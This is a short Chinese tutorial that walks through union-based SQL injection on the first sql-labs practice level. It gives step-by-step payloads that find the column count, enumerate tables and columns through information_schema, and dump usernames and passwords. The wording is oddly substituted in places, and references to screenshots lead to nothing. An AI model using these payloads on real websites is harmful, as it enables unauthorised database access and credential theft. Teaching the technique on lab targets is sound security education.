显错注入

SQL注入漏洞是Web层面最高危的漏洞之一,经过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击。
一下直接用sql-labs第一关演示
1.题目让咱们请求一个id参数,以下
2.咱们输入一个单引号,显示报错,以下
 
3.因此练习咱们去看一下他的源代码,以下
4.咱们发现变量id在获取后直接代入sql语句查询,由此咱们能够构造出payload猜字段长,二分法可得:?id=-1' order by 3--+
5.知道字段长后,爆回显点:?id=-1' union select 1,2,3--+ 获得回显点在2,3
6.爆数据库:?id=-1' union select 1,database(),3--+ 获得数据库为security
7.爆出数据表并所有列出:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 咱们获得该数据库如下表,获得users的用户表
8.而后咱们继续爆字段名:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
9.咱们看到了username和password的列,继续爆出:?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+
10.0x3a主要是为了将username和password分割开 能够不加,主要是为了区分。
相关文章
相关标签/搜索